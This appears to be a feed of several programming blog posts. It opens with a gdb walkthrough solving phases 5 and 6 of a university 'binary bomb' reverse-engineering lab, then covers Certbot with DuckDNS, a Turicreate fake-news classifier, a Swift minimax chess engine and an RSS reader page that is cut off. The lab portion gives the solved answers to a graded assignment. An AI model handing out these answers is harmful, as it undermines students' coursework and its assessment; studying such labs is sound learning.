0x5555555571bf: "bruins"
(gdb) x/s 0x5555555571f0
0x5555555571f0 <array.0>: "maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"
(gdb)
To summarize the transformation process: for each input character, the low 4 bits are used as an index into the lookup table (array.0), and the resulting 6 characters must spell the reference string. Here's how the transformation process can be reversed for each character in "bruins":
1. Find the index of b
in the lookup table (in our case, it is 13 since we index starting 0)
2. Calculate binary representation of this index (in our case 13 can be written as 1101 in binary)
3. Find ASCII character whose least significant 4 bits match (in our case, m
has binary representation 01101101
)
Repeat for all 6 characters
Hint: Using an ASCII - Binary Table can save you time.
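If you would rather not do the lookups by hand, a small Python sketch using the lookup table and reference string we extracted with gdb can reverse the transformation for us:
table = "maduiersnfotvbyl"  # the first 16 bytes of array.0
target = "bruins"

answer = ""
for ch in target:
    idx = table.index(ch)  # the index our input's low 4 bits must produce
    for c in map(chr, range(0x61, 0x7B)):  # search the lowercase ASCII letters
        if ord(c) & 0xF == idx:
            answer += c
            break
print(answer)  # mfcdhg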
Thus, we can have the following transformation:
b -> m
r -> f
u -> c
i -> d
n -> h
s -> g
Let us try out this answer:
...
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
mfcdhg
Breakpoint 1, 0x0000555555555830 in phase_5 ()
(gdb) continue
Continuing.
Good work! On to the next...
Awesome!
Good work! On to the next...
test string
Breakpoint 1, 0x0000555555555899 in phase_6 ()
(gdb) disas phase_6
Dump of assembler code for function phase_6:
=> 0x0000555555555899 <+0>: endbr64
0x000055555555589d <+4>: push %r15
0x000055555555589f <+6>: push %r14
0x00005555555558a1 <+8>: push %r13
0x00005555555558a3 <+10>: push %r12
0x00005555555558a5 <+12>: push %rbp
0x00005555555558a6 <+13>: push %rbx
0x00005555555558a7 <+14>: sub $0x68,%rsp
0x00005555555558ab <+18>: lea 0x40(%rsp),%rax
0x00005555555558b0 <+23>: mov %rax,%r14
0x00005555555558b3 <+26>: mov %rax,0x8(%rsp)
0x00005555555558b8 <+31>: mov %rax,%rsi
0x00005555555558bb <+34>: call 0x555555555d97 <read_six_numbers>
0x00005555555558c0 <+39>: mov %r14,%r12
0x00005555555558c3 <+42>: mov $0x1,%r15d
0x00005555555558c9 <+48>: mov %r14,%r13
0x00005555555558cc <+51>: jmp 0x555555555997 <phase_6+254>
0x00005555555558d1 <+56>: call 0x555555555d4a <explode_bomb>
0x00005555555558d6 <+61>: jmp 0x5555555559a9 <phase_6+272>
0x00005555555558db <+66>: add $0x1,%rbx
0x00005555555558df <+70>: cmp $0x5,%ebx
0x00005555555558e2 <+73>: jg 0x55555555598f <phase_6+246>
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66>
0x00005555555558f2 <+89>: call 0x555555555d4a <explode_bomb>
0x00005555555558f7 <+94>: jmp 0x5555555558db <phase_6+66>
0x00005555555558f9 <+96>: mov 0x8(%rsp),%rdx
0x00005555555558fe <+101>: add $0x18,%rdx
0x0000555555555902 <+105>: mov $0x7,%ecx
0x0000555555555907 <+110>: mov %ecx,%eax
0x0000555555555909 <+112>: sub (%r12),%eax
0x000055555555590d <+116>: mov %eax,(%r12)
0x0000555555555911 <+120>: add $0x4,%r12
0x0000555555555915 <+124>: cmp %r12,%rdx
0x0000555555555918 <+127>: jne 0x555555555907 <phase_6+110>
0x000055555555591a <+129>: mov $0x0,%esi
0x000055555555591f <+134>: mov 0x40(%rsp,%rsi,4),%ecx
0x0000555555555923 <+138>: mov $0x1,%eax
0x0000555555555928 <+143>: lea 0x3d01(%rip),%rdx # 0x555555559630 <node1>
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555592f <+150>: cmp $0x1,%ecx
0x0000555555555932 <+153>: jle 0x55555555593f <phase_6+166>
0x0000555555555934 <+155>: mov 0x8(%rdx),%rdx
0x0000555555555938 <+159>: add $0x1,%eax
0x000055555555593b <+162>: cmp %ecx,%eax
0x000055555555593d <+164>: jne 0x555555555934 <phase_6+155>
0x000055555555593f <+166>: mov %rdx,0x10(%rsp,%rsi,8)
0x0000555555555944 <+171>: add $0x1,%rsi
0x0000555555555948 <+175>: cmp $0x6,%rsi
0x000055555555594c <+179>: jne 0x55555555591f <phase_6+134>
0x000055555555594e <+181>: mov 0x10(%rsp),%rbx
0x0000555555555953 <+186>: mov 0x18(%rsp),%rax
0x0000555555555958 <+191>: mov %rax,0x8(%rbx)
0x000055555555595c <+195>: mov 0x20(%rsp),%rdx
0x0000555555555961 <+200>: mov %rdx,0x8(%rax)
0x0000555555555965 <+204>: mov 0x28(%rsp),%rax
0x000055555555596a <+209>: mov %rax,0x8(%rdx)
0x000055555555596e <+213>: mov 0x30(%rsp),%rdx
0x0000555555555973 <+218>: mov %rdx,0x8(%rax)
0x0000555555555977 <+222>: mov 0x38(%rsp),%rax
0x000055555555597c <+227>: mov %rax,0x8(%rdx)
0x0000555555555980 <+231>: movq $0x0,0x8(%rax)
0x0000555555555988 <+239>: mov $0x5,%ebp
0x000055555555598d <+244>: jmp 0x5555555559c4 <phase_6+299>
0x000055555555598f <+246>: add $0x1,%r15
0x0000555555555993 <+250>: add $0x4,%r14
0x0000555555555997 <+254>: mov %r14,%rbp
0x000055555555599a <+257>: mov (%r14),%eax
0x000055555555599d <+260>: sub $0x1,%eax
0x00005555555559a0 <+263>: cmp $0x5,%eax
0x00005555555559a3 <+266>: ja 0x5555555558d1 <phase_6+56>
0x00005555555559a9 <+272>: cmp $0x5,%r15d
0x00005555555559ad <+276>: jg 0x5555555558f9 <phase_6+96>
0x00005555555559b3 <+282>: mov %r15,%rbx
0x00005555555559b6 <+285>: jmp 0x5555555558e8 <phase_6+79>
0x00005555555559bb <+290>: mov 0x8(%rbx),%rbx
0x00005555555559bf <+294>: sub $0x1,%ebp
0x00005555555559c2 <+297>: je 0x5555555559d5 <phase_6+316>
0x00005555555559c4 <+299>: mov 0x8(%rbx),%rax
0x00005555555559c8 <+303>: mov (%rax),%eax
0x00005555555559ca <+305>: cmp %eax,(%rbx)
--Type <RET> for more, q to quit, c to continue without paging--
0x00005555555559cc <+307>: jge 0x5555555559bb <phase_6+290>
0x00005555555559ce <+309>: call 0x555555555d4a <explode_bomb>
0x00005555555559d3 <+314>: jmp 0x5555555559bb <phase_6+290>
0x00005555555559d5 <+316>: add $0x68,%rsp
0x00005555555559d9 <+320>: pop %rbx
0x00005555555559da <+321>: pop %rbp
0x00005555555559db <+322>: pop %r12
0x00005555555559dd <+324>: pop %r13
0x00005555555559df <+326>: pop %r14
0x00005555555559e1 <+328>: pop %r15
0x00005555555559e3 <+330>: ret
End of assembler dump.
(gdb)
Again, we see the familiar read_six_numbers function.
Let us analyse this function in chunks:
0x00005555555558bb <+34>: call 0x555555555d97 <read_six_numbers>
0x00005555555558c0 <+39>: mov %r14,%r12
0x00005555555558c3 <+42>: mov $0x1,%r15d
0x00005555555558c9 <+48>: mov %r14,%r13
0x00005555555558cc <+51>: jmp 0x555555555997 <phase_6+254>
1. mov %r14,%r12: %r14 should be pointing to the location on the stack where the numbers were read into. This address is copied into %r12.
2. mov $0x1,%r15d: The value 1 is moved into the %r15 register (probably acting as a counter).
3. mov %r14,%r13: The address is also copied to %r13.
0x0000555555555997 <+254>: mov %r14,%rbp
0x000055555555599a <+257>: mov (%r14),%eax
0x000055555555599d <+260>: sub $0x1,%eax
0x00005555555559a0 <+263>: cmp $0x5,%eax
0x00005555555559a3 <+266>: ja 0x5555555558d1 <phase_6+56>
1. mov (%r14),%eax: load the current number in the sequence.
2. sub $0x1,%eax: decrement the number by 1.
3. cmp $0x5,%eax: compare the adjusted value in %eax with 5.
4. ja 0x5555555558d1 <phase_6+56>: ja is an unsigned comparison, so this jumps if the adjusted value is greater than 5, which catches original values below 1 (they wrap around) as well as above 6.
=> All numbers should be between 1 and 6.
0x00005555555559a9 <+272>: cmp $0x5,%r15d
0x00005555555559ad <+276>: jg 0x5555555558f9 <phase_6+96>
This checks if the value stored in %r15
is > 5, if it is then it jumps somewhere else. This validates our assumption that %r15
is acting as a counter.
0x00005555555559b3 <+282>: mov %r15,%rbx
0x00005555555559b6 <+285>: jmp 0x5555555558e8 <phase_6+79>
Let us jump to +79
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66>
0x00005555555558f2 <+89>: call 0x555555555d4a <explode_bomb>
0x00005555555558f7 <+94>: jmp 0x5555555558db <phase_6+66>
This section deals with checking whether all the numbers in the sequence are unique. Thus, we need to ensure our 6 digits are unique.
0x00005555555558db <+66>: add $0x1,%rbx // Increments by 1
0x00005555555558df <+70>: cmp $0x5,%ebx
0x00005555555558e2 <+73>: jg 0x55555555598f <phase_6+246> // Jump if > 5 (Loop iterations are complete)
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66> // Again, check if the number being seen is unique
Now we know that the numbers are unique, between 1-6 (inclusive).
After stepping through the instructions, we can also see that the numbers are being transformed:
* Each number is subtracted from 7 (mov $0x7,%ecx followed by sub (%r12),%eax)
* This effectively maps the numbers as follows: 1 to 6, 2 to 5, 3 to 4, 4 to 3, 5 to 2, and 6 to 1.
Let us try to figure out what 0x0000555555555928 <+143>: lea 0x3d01(%rip),%rdx # 0x555555559630 <node1>
is:
(gdb) x/30wx 0x555555559630
0x555555559630 <node1>: 0x000000d9 0x00000001 0x55559640 0x00005555
0x555555559640 <node2>: 0x000003ab 0x00000002 0x55559650 0x00005555
0x555555559650 <node3>: 0x0000014f 0x00000003 0x55559660 0x00005555
0x555555559660 <node4>: 0x000000a1 0x00000004 0x55559670 0x00005555
0x555555559670 <node5>: 0x000001b3 0x00000005 0x55559120 0x00005555
0x555555559680 <host_table>: 0x555573f5 0x00005555 0x5555740f 0x00005555
0x555555559690 <host_table+16>: 0x55557429 0x00005555 0x00000000 0x00000000
0x5555555596a0 <host_table+32>: 0x00000000 0x00000000
(gdb) x/30wx 0x555555559120
0x555555559120 <node6>: 0x000002da 0x00000006 0x00000000 0x00000000
0x555555559130: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559140 <userid>: 0x61767861 0x38383535 0x00000000 0x00000000
0x555555559150 <userid+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559160 <userid+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559170 <userid+48>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559180 <userid+64>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559190 <userid+80>: 0x00000000 0x00000000
(gdb)
It appears that this is a linked list, with roughly the following structure:
struct node {
int value;
int index;
struct node *next;
};
Let us convert the values into decimal:
0x000000d9 -> 217
0x000003ab -> 939
0x0000014f -> 335
0x000000a1 -> 161
0x000001b3 -> 435
0x000002da -> 730
Missing Notes
To re-arrange this linked list in descending order, we would arrange it as follows:
Node 2 -> Node 6 -> Node 5 -> Node 3 -> Node 1 -> Node 4
Since we also need to apply the transformation: 7 - x
:
(7-2) -> (7-6) -> ... -> (7-4)
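The same computation in Python, using the node values we read out of memory:
values = {1: 217, 2: 939, 3: 335, 4: 161, 5: 435, 6: 730}
order = sorted(values, key=values.get, reverse=True)  # nodes in descending order of value
print(order)                         # [2, 6, 5, 3, 1, 4]
print([7 - node for node in order])  # [5, 1, 2, 4, 6, 3]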
Final answer: 5 1 2 4 6 3
Let us try the answer:
...
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
5 1 2 4 6 3
Breakpoint 1, 0x0000555555555899 in phase_6 ()
(gdb) continue
Continuing.
Congratulations! You've defused the bomb!
Your instructor has been notified and will verify your solution.
[Inferior 1 (process 1754) exited normally]
But, what about the secret phase?
]]>I have a Raspberry Pi running a Flask app through Gunicorn (Ubuntu 20.04 LTS). I am exposing it to the internet using DuckDNS.
sudo apt update && sudo apt install certbot -y
sudo certbot certonly --manual --preferred-challenges dns-01 --email senpai@email.com -d mydomain.duckdns.org
After you accept that you are okay with your IP address being logged, it will prompt you to update your DNS record. You need to create a new TXT
record in the DNS settings for your domain.
For DuckDNS users it is as simple as entering this URL in their browser:
http://duckdns.org/update?domains=mydomain&token=duckdnstoken&txt=certbotdnstxt
Where mydomain
is your DuckDNS domain, duckdnstoken
is your DuckDNS Token ( Found on the dashboard when you login) and certbotdnstxt
is the TXT record value given by the prompt.
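If you would rather script this step, here is a rough sketch using the requests library (mydomain, duckdnstoken, and certbotdnstxt are the same placeholders as above):
import requests

resp = requests.get(
    "http://duckdns.org/update",
    params={
        "domains": "mydomain",    # your DuckDNS domain
        "token": "duckdnstoken",  # your DuckDNS token
        "txt": "certbotdnstxt",   # the TXT value from the Certbot prompt
    },
)
print(resp.text)  # DuckDNS replies with OK on success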
You can check if the TXT records have been updated by using the dig
command:
dig navanspi.duckdns.org TXT
; <<>> DiG 9.16.1-Ubuntu <<>> navanspi.duckdns.org TXT
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27592
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;navanspi.duckdns.org. IN TXT
;; ANSWER SECTION:
navanspi.duckdns.org. 60 IN TXT "4OKbijIJmc82Yv2NiGVm1RmaBHSCZ_230qNtj9YA-qk"
;; Query time: 275 msec
;; SERVER: 127.0.0.53#53(127.0.0.53)
;; WHEN: Tue Nov 17 15:23:15 IST 2020
;; MSG SIZE rcvd: 105
DuckDNS almost instantly propagates the changes but for other domain hosts, it could take a while.
Once you have ensured that the TXT record changes have been successfully applied and are visible through the dig
command, press enter on the Certbot prompt and your certificate should be generated.
As we generated the certificate manually, certbot renew
will fail; to renew the certificate, you simply re-generate it using the above steps.
Example Gunicorn command for running a web-app:
gunicorn api:app -k uvicorn.workers.UvicornWorker -b 0.0.0.0:7589
To use the certificate with it, simply copy the cert.pem
and privkey.pem
to your working directory ( change the appropriate permissions ) and include them in the command
gunicorn api:app -k uvicorn.workers.UvicornWorker -b 0.0.0.0:7589 --certfile=cert.pem --keyfile=privkey.pem
Caveats with copying the certificate: If you renew the certificate you will have to re-copy the files
]]>In this tutorial we will build a fake news detecting app from scratch, using Turicreate for the machine learning model and SwiftUI for building the app
Note: These commands are written as if you are running a jupyter notebook.
To build a classifier, you need a lot of data. George McIntire (GH: @joolsa) has created a wonderful dataset containing the headline, body and whether it is fake or real. Whenever you are looking for a dataset, always try searching on Kaggle and GitHub before you start building your own
I used a Google Colab instance for training my model. If you also plan on using Google Colab, I recommend choosing a GPU instance (it is free), which allows you to train the model on the GPU. Turicreate is built on top of Apache's MXNet framework; for us to use the GPU, we need to install a CUDA-compatible MXNet package.
!pip install turicreate
!pip uninstall -y mxnet
!pip install mxnet-cu100==1.4.0.post0
If you do not wish to train on GPU or are running it on your computer, you can ignore the last two lines
!wget -q "https://github.com/joolsa/fake_real_news_dataset/raw/master/fake_or_real_news.csv.zip"
!unzip fake_or_real_news.csv.zip
import turicreate as tc
tc.config.set_num_gpus(-1) # If you do not wish to use GPUs, set it to 0
dataSFrame = tc.SFrame('fake_or_real_news.csv')
The dataset contains a column named "X1", which is of no use to us. Therefore, we simply drop it
dataSFrame.remove_column('X1')
train, test = dataSFrame.random_split(.9)
model = tc.text_classifier.create(
dataset=train,
target='label',
features=['title','text']
)
+-----------+----------+-----------+--------------+-------------------+---------------------+
| Iteration | Passes | Step size | Elapsed Time | Training Accuracy | Validation Accuracy |
+-----------+----------+-----------+--------------+-------------------+---------------------+
| 0 | 2 | 1.000000 | 1.156349 | 0.889680 | 0.790036 |
| 1 | 4 | 1.000000 | 1.359196 | 0.985952 | 0.918149 |
| 2 | 6 | 0.820091 | 1.557205 | 0.990260 | 0.914591 |
| 3 | 7 | 1.000000 | 1.684872 | 0.998689 | 0.925267 |
| 4 | 8 | 1.000000 | 1.814194 | 0.999063 | 0.925267 |
| 9 | 14 | 1.000000 | 2.507072 | 1.000000 | 0.911032 |
+-----------+----------+-----------+--------------+-------------------+---------------------+
test_predictions = model.predict(test)
accuracy = tc.evaluation.accuracy(test['label'], test_predictions)
print(f'Topic classifier model has a testing accuracy of {accuracy*100}% ', flush=True)
Topic classifier model has a testing accuracy of 92.3076923076923%
We have just created our own Fake News Detection Model which has an accuracy of 92%!
example_text = {"title": ["Middling ‘Rise Of Skywalker’ Review Leaves Fan On Fence About Whether To Threaten To Kill Critic"], "text": ["Expressing ambivalence toward the relatively balanced appraisal of the film, Star Wars fan Miles Ariely admitted Thursday that an online publication’s middling review of The Rise Of Skywalker had left him on the fence about whether he would still threaten to kill the critic who wrote it. “I’m really of two minds about this, because on the one hand, he said the new movie fails to live up to the original trilogy, which makes me at least want to throw a brick through his window with a note telling him to watch his back,” said Ariely, confirming he had already drafted an eight-page-long death threat to Stan Corimer of the website Screen-On Time, but had not yet decided whether to post it to the reviewer’s Facebook page. “On the other hand, though, he commended J.J. Abrams’ skillful pacing and faithfulness to George Lucas’ vision, which makes me wonder if I should just call the whole thing off. Now, I really don’t feel like camping outside his house for hours. Maybe I could go with a response that’s somewhere in between, like, threatening to kill his dog but not everyone in his whole family? I don’t know. This is a tough one.” At press time, sources reported that Ariely had resolved to wear his Ewok costume while he murdered the critic in his sleep."]}
example_prediction = model.classify(tc.SFrame(example_text))
print(example_prediction, flush=True)
+-------+--------------------+
| class | probability |
+-------+--------------------+
| FAKE | 0.9245648658345308 |
+-------+--------------------+
[1 rows x 2 columns]
model_name = 'FakeNews'
coreml_model_name = model_name + '.mlmodel'
exportedModel = model.export_coreml(coreml_model_name)
Note: To download files from Google Colab, simply click on the files section in the sidebar, right click on filename and then click on download
First we create a single view app (make sure you check the use SwiftUI button)
Then we copy our .mlmodel file to our project (Just drag and drop the file in the XCode Files Sidebar)
Our ML model does not take a string directly as an input; rather, it takes a bag of words. The bag-of-words model is a simplifying representation used in NLP, in which text is represented as a bag of its words, without any regard for grammar or word order, but keeping track of multiplicity.
We define our bag of words function
func bow(text: String) -> [String: Double] {
var bagOfWords = [String: Double]()
let tagger = NSLinguisticTagger(tagSchemes: [.tokenType], options: 0)
let range = NSRange(location: 0, length: text.utf16.count)
let options: NSLinguisticTagger.Options = [.omitPunctuation, .omitWhitespace]
tagger.string = text
tagger.enumerateTags(in: range, unit: .word, scheme: .tokenType, options: options) { _, tokenRange, _ in
let word = (text as NSString).substring(with: tokenRange)
if bagOfWords[word] != nil {
bagOfWords[word]! += 1
} else {
bagOfWords[word] = 1
}
}
return bagOfWords
}
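For example, calling bow(text: "to be or not to be") returns ["to": 2, "be": 2, "or": 1, "not": 1] (with the counts stored as Doubles), which is exactly the dictionary-of-word-counts input the Core ML model expects.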
We also declare our variables
@State private var title: String = ""
@State private var headline: String = ""
@State private var alertTitle = ""
@State private var alertText = ""
@State private var showingAlert = false
Finally, we implement a simple function which reads the two text fields, creates their bag of words representation and displays an alert with the appropriate result
Complete Code
import SwiftUI
struct ContentView: View {
@State private var title: String = ""
@State private var headline: String = ""
@State private var alertTitle = ""
@State private var alertText = ""
@State private var showingAlert = false
var body: some View {
NavigationView {
VStack(alignment: .leading) {
Text("Headline").font(.headline)
TextField("Please Enter Headline", text: $title)
.lineLimit(nil)
Text("Body").font(.headline)
TextField("Please Enter the content", text: $headline)
.lineLimit(nil)
}
.navigationBarTitle("Fake News Checker")
.navigationBarItems(trailing:
Button(action: classifyFakeNews) {
Text("Check")
})
.padding()
.alert(isPresented: $showingAlert){
Alert(title: Text(alertTitle), message: Text(alertText), dismissButton: .default(Text("OK")))
}
}
}
func classifyFakeNews(){
let model = FakeNews()
let myTitle = bow(text: title)
let myText = bow(text: headline)
do {
let prediction = try model.prediction(title: myTitle, text: myText)
alertTitle = prediction.label
alertText = "It is likely that this piece of news is \(prediction.label.lowercased())."
print(alertText)
} catch {
alertTitle = "Error"
alertText = "Sorry, could not classify if the input news was fake or not."
}
showingAlert = true
}
func bow(text: String) -> [String: Double] {
var bagOfWords = [String: Double]()
let tagger = NSLinguisticTagger(tagSchemes: [.tokenType], options: 0)
let range = NSRange(location: 0, length: text.utf16.count)
let options: NSLinguisticTagger.Options = [.omitPunctuation, .omitWhitespace]
tagger.string = text
tagger.enumerateTags(in: range, unit: .word, scheme: .tokenType, options: options) { _, tokenRange, _ in
let word = (text as NSString).substring(with: tokenRange)
if bagOfWords[word] != nil {
bagOfWords[word]! += 1
} else {
bagOfWords[word] = 1
}
}
return bagOfWords
}
}
struct ContentView_Previews: PreviewProvider {
static var previews: some View {
ContentView()
}
}
Ever since Chess24 shut down, I have been looking to find a better way to follow Chess tournaments. A few weeks ago I decided to start working on a cross-platform (macOS/iOS) app using Lichess's API. I heavily underestimated the amount of work it would take me to build something like this in SwiftUI. You not only need a library that can parse PGNs, but also a way to display those moves!
I ended up forking Sage to swift-chess-neo. I did have to patch the library to make it compatible with Swift 5 and create my own UI components using SwiftUI.
Now that I had a working Chess library that could give me all legal moves in a position, I wondered if I could write a minimax implementation.
Imagine you could look far ahead into the future and predict the perfect moves in a game for both sides. This is similar to Dr. Strange seeing all 14,000,605 alternate futures. Knowing what works and what doesn't can help you decide what you should actually play.
Using the example of Dr. Strange looking into the alternate futures, think of the Avengers winning being scored as +1, and Thanos winning being scored as -1. The Avengers would try to maximize this score, whereas Thanos would try to minimize this.
This is the idea of "minimax".
Say we are playing a game of Tic-Tac-Toe, where us winning is scored positively and our opponent winning is scored negatively. We are going to try and maximize our score. A fresh game of Tic-Tac-Toe can be represented as a 3x3 grid, which means that if we have the first turn, we have 9 possible moves.
Say we place an X in the top left corner:
-------------
| x | | |
-------------
| | | |
-------------
| | | |
-------------
Now, our opponent has 8 different moves they can play. Say they play their move in the bottom right corner:
-------------
| x | | |
-------------
| | | |
-------------
| | | o |
-------------
We have 6 different moves we can play.
It would take us ages to brute force each and every combination/permutation of moves by hand. A depth-first minimax algorithm for Tic-Tac-Toe would have a max depth of 9 (since after 9 moves from the start, we would have exhausted the search space as there would be no more available moves).
Since we cannot score an individual Tic-Tac-Toe position (technically we can), we can iterate through all moves (till we reach our max-depth) and then use these three terminal states:
function minimax(board, depth, isMaximizingPlayer):
score = evaluate(board)
# +1 Win, -1 Lose, 0 Draw
if score == 1: return score
if score == -1: return score
if boardFull(board):
return 0
if isMaximizingPlayer:
best = -infinity
for each cell in board:
if cell is empty:
place X in cell
best = maximum of (best, minimax(board, depth + 1, false))
remove X from cell
return best
else:
best = infinity
for each cell in board:
if cell is empty:
place O in cell
best = minimum of (best, minimax(board, depth + 1, true))
remove O from cell
return best
function evaluate(board):
if three consecutive Xs: return 1
if three consecutive Os: return -1
return 0
function boardFull(board):
if all cells are filled: return true
else:
return false
Think of each move as a node, and each node having multiple continuations (each continuing move can be represented as a node).
This is quite inefficient, as it will comb through all of the moves! Imagine iterating through the entire search space for a complex game like Chess; it would be impossible. Therefore, we use a technique called alpha-beta pruning, wherein we reduce the number of nodes that we evaluate.
function minimax(board, depth, isMaximizingPlayer, alpha, beta):
score = evaluate(board)
# +1 Win, -1 Lose, 0 Draw
if score == 1: return score
if score == -1: return score
if boardFull(board):
return 0
if isMaximizingPlayer:
best = -infinity
for each cell in board:
if cell is empty:
place X in cell
best = maximum of (best, minimax(board, depth + 1, false, alpha, beta))
remove X from cell
alpha = max(alpha, best)
if beta <= alpha:
break
return best
else:
best = infinity
for each cell in board:
if cell is empty:
place O in cell
best = minimum of (best, minimax(board, depth + 1, true, alpha, beta))
remove O from cell
beta = min(beta, best)
if beta <= alpha:
break
return best
Alpha and beta are initialized as -infinity and +infinity respectively, with alpha representing the best already explored option along the path to the root for the maximizer, and beta representing the best already explored option along the path to the root for the minimizer. If at any point beta is less than or equal to alpha, it means that the current branch does not need to be explored further because the parent node already has a better move elsewhere, thus "pruning" this node.
Thus, to implement a model on which you can run minimax (or similar algorithms), you need to be able to describe the following: the legal moves in a position, a way to make and take back moves, and a way to score a position.
The chess library does a little bit of the heavy lifting by already providing methods to take care of the above requirements. Since we already have a way to find all possible moves in a position, we only need to figure out a few more functions/methods: to set up a position I added a setGame method to the Game class, to take back moves I use the undoMove() method, and to score a position we need an evaluation function.
Each piece has a different relative value. Since "capturing" the king finishes the game, the king is given a really high value.
public struct Piece: Hashable, CustomStringConvertible {
public enum Kind: Int {
...
public var relativeValue: Double {
switch self {
case .pawn: return 1
case .knight: return 3
case .bishop: return 3.25
case .rook: return 5
case .queen: return 9
case .king: return 900
}
}
...
}
...
}
We extend the Game class by adding an evaluate function that adds up the value of all the pieces left on the board.
extension Game {
func evaluate() -> Double {
var score: Double = 0
for square in Square.all {
if let piece = board[square] {
score += piece.kind.relativeValue * (piece.color == .white ? 1.0 : -1.0)
}
}
return score
}
}
Since the values for black pieces are multiplied by -1 and white pieces by +1, material advantage on the board translates to a higher/lower evaluation.
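For example, in the starting position material is equal, so we would expect an evaluation of 0 (a minimal sketch, assuming the library's default Game() initializer sets up the standard starting position):
let freshGame = Game()
print(freshGame.evaluate()) // 0.0 — both sides start with identical material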
Taking inspiration from the pseudocode above, we can define a minimax function in Swift as:
func minimax(depth: Int, isMaximizingPlayer: Bool, alpha: Double, beta: Double) -> Double {
if depth == 0 || isFinished {
return evaluate()
}
var alpha = alpha
var beta = beta
if isMaximizingPlayer {
var maxEval: Double = -.infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let eval = minimax(depth: depth - 1, isMaximizingPlayer: false, alpha: alpha, beta: beta)
maxEval = max(maxEval, eval)
undoMove()
alpha = max(alpha, eval)
if beta <= alpha {
break
}
}
return maxEval
} else {
var minEval: Double = .infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let eval = minimax(depth: depth - 1, isMaximizingPlayer: true, alpha: alpha, beta: beta)
minEval = min(minEval, eval)
undoMove()
beta = min(beta, eval)
if beta <= alpha {
break
}
}
return minEval
}
}
We can now get a score for a move at a given depth, so we wrap this up as a public method:
extension Game {
public func bestMove(depth: Int) -> Move? {
var bestMove: Move?
var bestValue: Double = (playerTurn == .white) ? -.infinity : .infinity
let alpha: Double = -.infinity
let beta: Double = .infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let moveValue = minimax(depth: depth - 1, isMaximizingPlayer: playerTurn.isBlack ? false : true, alpha: alpha, beta: beta)
undoMove()
if (playerTurn == .white && moveValue > bestValue) || (playerTurn == .black && moveValue < bestValue) {
bestValue = moveValue
bestMove = move
}
}
return bestMove
}
}
import SwiftChessNeo
let game = try! Game(position: Game.Position(fen: "8/5B2/k5p1/4rp2/8/8/PP6/1K3R2 w - - 0 1")!)
let move = game.bestMove(depth: 5)
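To see the engine play, you could let it make a few moves against itself (a sketch; it assumes the bestMove(depth:) and execute(uncheckedMove:) methods shown above are accessible on Game):
for _ in 0..<6 {
    guard let next = game.bestMove(depth: 4) else { break } // no legal moves left
    try! game.execute(uncheckedMove: next)
    print(next)
}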
Of course, there are tons of improvements you can make to this naive algorithm. A better scoring function that understands the importance of piece positioning would make it even stronger. The Chess Programming Wiki is an amazing resource if you want to learn more about this.
]]>If you want to directly open the HTML file in your browser after saving, don't forget to set CORS_PROXY=""
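In the listing below, that means changing the constant near the top of the script to an empty string:
const CORS_PROXY = ""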
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
RSS Feed
</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
</head>
<body>
<h1 align="center" class="display-1">RSS Feed</h1>
<main>
<div class="container">
<div class="list-group pb-4" id="contents"></div>
<div id="feed">
</div></div>
</main>
<script src="https://gitcdn.xyz/repo/rbren/rss-parser/master/dist/rss-parser.js"></script>
<script>
const feeds = {
"BuzzFeed - India": {
"link":"https://www.buzzfeed.com/in.xml",
"summary":true
},
"New Yorker": {
"link":"http://www.newyorker.com/feed/news",
},
"Vox":{
"link":"https://www.vox.com/rss/index.xml",
"limit": 3
},
"r/Jokes":{
"link":"https://reddit.com/r/Jokes/hot/.rss?sort=hot",
"ignore": ["repost","discord"]
}
}
const config_extra = {
"Responsive-Images": true,
"direct-link": false,
"show-date":false,
"left-column":false,
"defaults": {
"limit": 5,
"summary": true
}
}
const CORS_PROXY = "https://cors-anywhere.herokuapp.com/"
var contents_title = document.createElement("h2")
contents_title.textContent = "Contents"
contents_title.classList.add("pb-1")
document.getElementById("contents").appendChild(contents_title)
async function myfunc(key){
var count_lim = feeds[key]["limit"]
var count_lim = (count_lim === undefined) ? config_extra["defaults"]["limit"] : count_lim
var show_summary = feeds[key]["summary"]
var show_summary = (show_summary === undefined) ? config_extra["defaults"]["summary"] : show_summary
var ignore_tags = feeds[key]["ignore"]
var ignore_tags = (ignore_tags === undefined) ? [] : ignore_tags
var contents = document.createElement("a")
contents.href = "#" + key
contents.classList.add("list-group-item","list-group-item-action")
contents.textContent = key
document.getElementById("contents").appendChild(contents)
var feed_div = document.createElement("div")
feed_div.id = key
feed_div.setAttribute("id", key);
var title = document.createElement("h2");
title.textContent = "From " + key;
title.classList.add("pb-1")
feed_div.appendChild(title)
document.getElementById("feed").appendChild(feed_div)
var parser = new RSSParser();
var countPosts = 0
parser.parseURL(CORS_PROXY + feeds[key]["link"], function(err, feed) {
if (err) throw err;
